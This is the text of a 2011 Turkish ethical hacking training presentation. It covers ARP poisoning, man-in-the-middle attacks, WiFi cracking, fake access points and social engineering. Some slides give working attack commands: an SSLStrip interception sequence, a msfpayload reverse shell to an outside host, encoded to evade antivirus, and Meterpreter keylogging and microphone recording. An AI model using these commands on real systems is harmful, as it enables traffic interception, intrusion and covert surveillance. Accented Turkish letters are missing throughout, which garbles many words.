Download - Ethical Hacking Sunum
-
Gvenlik Riskleri ve Saldr Yntemleri
Ozan [email protected]
Bilgi Gvenlii Akademisi (BGA)
Melike Pnar Koleji BURSA 2011
-
Hacking Kltr Hakknda
Bilgisayar yeralt dnyas bir aynal salondur. Gerek bklr, dorular klr.
- Sfra Doru
www.bga.com.tr 2
-
Bilinen Baz Yanllar
Yanl bildiimiz veya yanl tantrldmz
Hack ve Hacker kavramlarna bir bakalm
www.bga.com.tr 3
-
C|EH TRKYE
Bilgi gvenlii kapsamnda biliim gnlllerine destek vermek iin bilgi birikimini ve tecrbelerini paylaan Ethical Hackerlarn oluturduu bir bilgi gvenlii ktphanesidir.
www.bga.com.tr 4
-
Bilgi Gvenlii Akademisi
2008 ylnda Trkiyedeki bilgi gvenlii sektrne profesyonel anlamda destek olmak amacyla kurulan Bilgi Gvenlii AKADEMS ileri seviye gvenlik danmanl ve gvenlik eitimleri konularnda kurumlara hizmet vermektedir.
Aktif alma hayatna balad 2008 ylndan bu yana zel, kamu ve askeri alanda 300n zerinde eitim ve danmanlk referans olmutur.
Sektrn geliimine katkda bulunmak amacyla her yl 10nun zerinde bilgi gvenlii etkinliine destek veren Bilgi Gvenlii AKADEMSnin temel hedefi Trkiye ve dnyada rn bamsz gvenlik anlaynn yerlemesidir.
www.bga.com.tr 5
-
Hack
Bir bilgisayarla bir hedefe ynelik olarak deil de oyuncu ve aratrmac biimde etkileim kurmak.
dehann/hnerin doru uygulan olarak tanmlanabilir.
Sonu abuk bir yama olsun, ya da dikkatlice yaratlm bir sanat eseri olsun, iindeki zekaya hayran kalmalsnz.
www.bga.com.tr 6
-
Hacker
Dilimizde bir karl yok fakat stad kelimesi
hacker yerine kullanlabilir.
Programlanabilen sistemlerin, yalnzca gereken
minimumu renmeyi tercih eden ounluun aksine,
detaylarn ve yeteneklerinin nasl geniletilebileceini
aratrmaktan holanan kimse
Herhangi bir konuda uzman ya da merakl kimse.
rnein astronomi hacker'
www.bga.com.tr 7
-
Cracker
Gazetecilerin hacker terimini yanl kullanarak
tarif ettikleri bilgisayar korsanlarn tanmlamak iin
hacker'lar tarafndan 1985'te oluturulan bir terim.
www.bga.com.tr 8
Bu kiiler bilgiyasar sistemlerini krarak zarar vermekten zevk alrlar.ounluu gen erkeklerden oluan bu gurup kendilerine toplum ierisinde yksek sesle hacker demeyi severler.
-
Lamer
Hacking, Cracking gibi konularda bilgisi olmadan veya
kulaktan dolma bilgilerle hacker gibi davranmaya
alan kiilerdir...
statlar tarafndan sevilmezler ve biraz da alayc
ekilde Lamer olarak adlandrlrlar.
Eer bir sisteme girmeyi baarrlarsa
ok fazla iz brakrlar, izlerini silemezler
veya girdikleri sistemden kendilerine
virs bulatrabilirler.
www.bga.com.tr 9
-
Sunum erii
A Tabanl Saldrlar (Uygulamal)
ARP/RARP Protokolleri ve Zayflklar
Yerel An Zehirlenmesi
Ortadaki Adam (mitm) Saldrs
Facebook, MSN Yazmalarn Grntleme, Mailleri ele geirme
SSL Trafiinde araya girme (SSLStrip)
Kablosuz Alarda Gvenlik
WEP/WPA ifrelemelerinin krlmas
Sahte Kablosuz Eriim Noktalar ( Uygulamal )
www.bga.com.tr 10
-
Sunum erii | Devam
Casus yazlmlarn yaratt tehlikeler (Uygulamal)
Antivirus yazlmlar nasl atlatlr ?
Gelimi bir casus yazlm olarak Meterpreter
Webcam grntlerini ele geirme
Ortam dinleme
Ekran grnts alma
Klavye girilerini yakalamak
Sosyal Mhendis Saldrlar
nsan tabanl zafiyetler ve Aldatma sanat
rnek ses kayd
Sosyal Mhendislik Arac (SET)
www.bga.com.tr 11
-
A Tabanl Saldrlar
ARP/RARP Protokol;
Bu protokol iki bilgisayarn haberlemesi iin gerekli fiziksel adreslerin tespit edilmesini salar.
Aa balanan bir A bilgisayar, B bilgisayarna ulamak istedii zaman B bilgisayarnn IP adresine karlk gelen MAC adresini bulmak iin tm aa broadcast ile yayn yapar.
Broadcast istei ada bulunan tm bilgisayarlara iletili, fakat yant yalnzca B bilgisayarndan dner.
www.bga.com.tr 12
-
A Tabanl Saldrlar
Yerel An Zehirlenmesi;
Saldrgan, A bilgisayarna sahte arp paketleri gndererek arp nbelleini zehirleyecek ve tm veriler saldrgann MAC adresine gnderilecektir.
www.bga.com.tr 13
-
A Tabanl Saldrlar
MITM Saldrs;
Ortadaki adam saldrsnda, saldrgan kaynak ve hedef iki sistemi kandrarak trafiin zerinden gemesini amalar.
www.bga.com.tr 14
-
A Tabanl Saldrlar | Uygulama
Yerel An Zehirlenmesi.BackTrack Linux zerinde Ettercap ile uygulama;
FTP, SMTP, HTTP parolalar
www.bga.com.tr 15
-
A Tabanl Saldrlar | Uygulama
Windows zerinde Cain&Abel yazlm ile uygulama
www.bga.com.tr 16
-
Facebook Chat Forensics
Facebook Chat kaytlar;
fbs.py cehturkiye ekibi tarafndan network forensic arac olarak yazlmtr.
www.bga.com.tr 17
-
SSL trafiinde araya girme (SSLStrip)
SSLStrip alma ekli
1. Saldrgan, kurban sistemin trafiini zerinden geirir.
2. Saldrgan, hedef sunucudan gelen https balantlarn kendi zerinde sonlandrp istemciye http olarak iletir.
3. stemciden dnen trafik okunabilir olduundan, saldrgan tm verileri grntleyebilir/kaydedebilir.
www.bga.com.tr 18
-
SSL trafiinde araya girme (SSLStrip)
Saldr denemesi;
1. Sistemini ynlendirme moduna geirecho "1" > /proc/sys/net/ipv4/ip_forward
2. Hedef portu 80 olan trafii, dinlediin porta (88) ynlendir.iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 88
3. Hedef sistem ile ynlendirici arasna girarpspoof -i -t
4. SSLStrip ile trafii kaydetpython sslstrip.py -f -p -w veriler -l 88
www.bga.com.tr 19
Saldr ile elde edilen
bilgiler
-
Kablosuz Alarda Gvenlik
WEP korumal alar krmak; Algoritmas zayftr
Parolay krmak iin yeterli sayda paket yakalamak gerekiyor
Parolann kark ve uzun olmas nemli deildir.
Video: http://www.cehturkiye.com/index.php/2009/01/11/wireless-networkleri-hacklemek/wireless-networkleri-hacklemek.html
www.bga.com.tr 20
-
Kablosuz Alarda Gvenlik
WPA korumal alar krmak;
Gl bir algoritmas bulunuyor (henz krlamad)
Parolay krmak iin yeterli sayda paket yakalamak gerekiyor
Parolann kark ve uzun olmas krma ilemini uzatr.
Belge: http://www.cehturkiye.com/index.php/2010/06/07/wireless-pentest-wpa-crack/wireless-pentest-wpa-crack.html
www.bga.com.tr 21
-
Sahte Kablosuz Eriim Noktalar(Uygulamal)
Yalnzca amac kt olduu iin sahte olarak isimlendirilir, gereinden ayrt edilemez
Kablosuz internet kullanclarn hedefler
Kablosuz a istemcileri, saldrgan tarafndan yayn yapan kablosuz aa dahil oldukdan sonra, tm internet trafii kaydedilir.
DNS nbelleini zehirleyerek sahte eriim sayfalar ile kimlik av yapabilir.
www.bga.com.tr 22
-
Sahte Kablosuz Eriim Noktalar(Uygulamal)
www.bga.com.tr 23
Saldr yaplan sistemden ekran grnts
-
Sahte Kablosuz Eriim Noktalar(Uygulamal)
www.bga.com.tr 24
nternete ilk girildii anda, sahte bir gncelleme mesaj ile casus yazlm kurban bilgisayara yklenir.
-
Antivirus yazlmlar nasl atlatlr ?
www.bga.com.tr 25
mza tabanl ve shell test yapan antivirusler
Sezgisel Antiviruslerin alma mant ?
Saldr tespit ve Engelleme Sistemleri
./msfpayloadwindows/shell_reverse_tcpLHOST=ozan.dyndns.org LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe> /tmp/trojan.exe
-
Gelimi bir casus yazlm olarak Meterpreter
www.bga.com.tr 26
Keylogger olarak kullanm;
> keyscan_start
> keyscan_dump
Hedefin ekran grntsn ele geirme
> screeshot
-
Gelimi bir casus yazlm olarak Meterpreter
www.bga.com.tr 27
Ortam Dinleme
Kurban sistemde bir mikrofon varsa, ortam dinlemesi yaplabilir.> record_mic -d 25 // 25. sn boyunca dinleme yap ve kaydet.
[*] Starting...
[*] Stopped
Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav
Webcam Grntsn Ele Geirme
-
Sosyal Mhendis Saldrlar
www.bga.com.tr 28
nsan tabanl zaafiyetler ve Aldatma sanat
rnek ses kayd
Sosyal Mhendislik Arac (SET)
-
Sosyal Mhendis Saldrlar
www.bga.com.tr 29
-
Gerek Dnyadan Hacking rnekleri
www.bga.com.tr 30
Hepsibursada.com Saldr Giriimi;
Cookies manipulationJavaScript kontrollerini atlatmakFarkl kullancnn profil bilgilerini ele geirmek
-
Gerek Dnyadan Hacking rnekleri
www.bga.com.tr 31
xxxx.com ana saldr denemesi;
alan Aktif Servislerin Tespiti SSH Servisi Parola Krma Saldrs Exploit ile sisteme giri. Giri sonras network kefi Arkakap oluturma
-
Sorular ?